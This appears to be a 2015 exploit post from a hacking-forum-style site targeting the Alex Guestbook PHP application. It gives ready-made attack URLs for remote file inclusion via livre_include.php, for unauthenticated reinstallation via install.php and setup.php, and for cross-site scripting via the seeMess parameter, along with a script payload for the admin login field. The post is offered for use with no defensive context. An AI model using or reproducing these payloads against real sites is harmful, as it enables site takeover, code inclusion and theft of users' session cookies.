facebook facebook twitter rss

Alex Guestbook Multi Vulnerability exploit

Author: Stiva , Published: 24-06-2015
Hi By STIVA
/ # Bismi Allah
| # Title : Alex Guestbook Multi Vulnerability exploit
| # Author : Stiva
| # Language: PHP
| # Dork : n/a
| # Tested on: Ubuntu
| # Connect: FB_Id =100002444979819
| # Download : http://www.alexguestbook.net/
=======================================
[»] Alex Guestbook Multi Vulnerability
=======================================

[+] 1: Remote File Inclusion :
Problem : Include file
Exploit :
http://www.target.com/[home]/include/livre_include.php?no_connect=lol&chem_absolu=

=======================================

[+] 2: Install File :
Problem : ReInstall
Exploit :
http://www.target.com/[home]/install.php
http://www.target.com/[home]/setup.php

=======================================

Xss :
http://www.target.com/[home]//index.php?lang=english&skin=&debut=0&seeAdd=1&seeNotes=&seeMess=[XSS]

POST input f_login :
http://www.target.com/[home]/admin/
add Xss to Login Input :
<script type="text/vbscript">alert(DOCUMENT.COOKIE)</script>

=======================================

Greetz :
exploit4arab.net

Like us on Facebook :